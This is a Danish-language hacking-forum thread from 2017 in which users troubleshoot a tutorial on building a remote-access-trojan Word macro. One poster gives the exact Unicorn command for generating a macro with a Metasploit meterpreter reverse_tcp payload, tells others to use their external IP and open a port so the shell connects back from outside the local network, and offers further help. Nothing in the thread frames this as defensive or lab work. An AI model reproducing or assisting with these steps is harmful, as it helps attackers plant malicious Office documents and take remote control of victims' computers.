[TUTORIAL] Word RAT Macro - Powershell
|
02-03-2017, 15:43
(Denne besked var sidst ændret: 02-03-2017, 17:58 af TheHacker.)
|
|||
|
|||
RE: Microsoft Word Macro - Powershell
(02-03-2017, 15:12)Peter33 Skrev: Lige et hurtigt spg, er denne tutorial til windows/linux eller mac computere? Citer:windows/meterpreter/reverse_tcp Windows :) (02-03-2017, 15:12)Peter33 Skrev: Lige et hurtigt spg, er denne tutorial til windows/linux eller mac computere? Rettere sagt, Windows og Linux. Du skal bruge Windows til Word og Linux til script og metasploit.
Kontakt mig, hvis du har brug for hjælp til noget!
|
|||
02-03-2017, 22:50
|
|||
|
|||
RE: [TUTORIAL] Word RAT Macro - Powershell
Hvilken port til portforwarding vil være smart at åbne til det her? Super fed tutorial.
|
|||
02-03-2017, 23:27
|
|||
|
|||
RE: [TUTORIAL] Word RAT Macro - Powershell | |||
03-03-2017, 10:18
|
|||
|
|||
RE: [TUTORIAL] Word RAT Macro - Powershell
(02-03-2017, 23:27)Doctor Blue Skrev: Det er lidt ligemeget, så længe det ikke er en du skal bruge til noget andet. :) Nemlig
Kontakt mig, hvis du har brug for hjælp til noget!
|
|||
03-03-2017, 21:02
(Denne besked var sidst ændret: 03-03-2017, 21:04 af zacko.)
|
|||
|
|||
RE: [TUTORIAL] Word RAT Macro - Powershell
En venlig sjæl der ved hvad jeg skal gøre?
Error quote: "[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode... [!] Length of shellcode was not generated. Check payload name and if Metasploit is working and try again. Exiting...." |
|||
03-03-2017, 21:44
(Denne besked var sidst ændret: 03-03-2017, 21:52 af MalcolmXI.)
|
|||
|
|||
RE: [TUTORIAL] Word RAT Macro - Powershell
Finder Unicorn selv Metasploits payload baseret på navn?
Hvis ikke, så ser det ud til du skal specificere din fulde path til din payload, ellers leder den i /Desktop/unicorn-master/windows/..... Hmm. Ifølgeprojektets readme skulle det han har skrevet nu være rigtigt nok. https://github.com/trustedsec/unicorn/bl...rn.py#L397 |
|||
03-03-2017, 22:00
(Denne besked var sidst ændret: 03-03-2017, 22:07 af zacko.)
|
|||
|
|||
RE: [TUTORIAL] Word RAT Macro - Powershell
(03-03-2017, 21:44)MalcolmXI Skrev: Finder Unicorn selv Metasploits payload baseret på navn? Ja det er sku lidt underligt :/ Malcolm har du prøvet at køre unicorn scriptet, virkede det for dig? |
|||
04-03-2017, 01:21
(Denne besked var sidst ændret: 04-03-2017, 10:06 af TheHacker.)
|
|||
|
|||
RE: [TUTORIAL] Word RAT Macro - Powershell
(03-03-2017, 22:00)plant Skrev: Ja det er sku lidt underligt :/ Jeg svarer lige i morgen tidlig :) Godnat ;) (03-03-2017, 22:00)plant Skrev: Ja det er sku lidt underligt :/ Hejsa Plant, Hvis du skriver msfconsole og så skriver search payload/windows/meterpreter/reverse_tcp er den første så payload/windows/meterpreter/reverse_tcp? Og når du laver macro scriptet, så skal du ikke skrive din inet ip, du skal skrive din external ip, ellers vil det kun virke lokalt. F.eks. sådan her: python unicorn.py windows/meterpreter/reverse_tcp 69.181.15.162 8080 macro Det er en tilfældig ip^^ :) Du finder din ip på https://www.whatismyip.com/ Skriv, hvis du ikke kan få det til at virke :)
Kontakt mig, hvis du har brug for hjælp til noget!
|
|||
04-03-2017, 13:15
|
|||
|
|||
RE: [TUTORIAL] Word RAT Macro - Powershell
windows/meterpreter/reverse_tcp ser ud til at være den anden øverste.
|
|||
04-03-2017, 17:36
|
|||
|
|||
RE: [TUTORIAL] Word RAT Macro - Powershell
(03-03-2017, 22:00)plant Skrev: Ja det er sku lidt underligt :/ Har ikke prøvet. Eftersom både Firefox og Chrome har fantastiske Word- og Readerfremvisningsevner, bruger jeg udelukkende mine browsers, så det ville kræve energi og tid at installere programmerne :P |
|||
|
User(s) browsing this thread: 1 Gæst(er)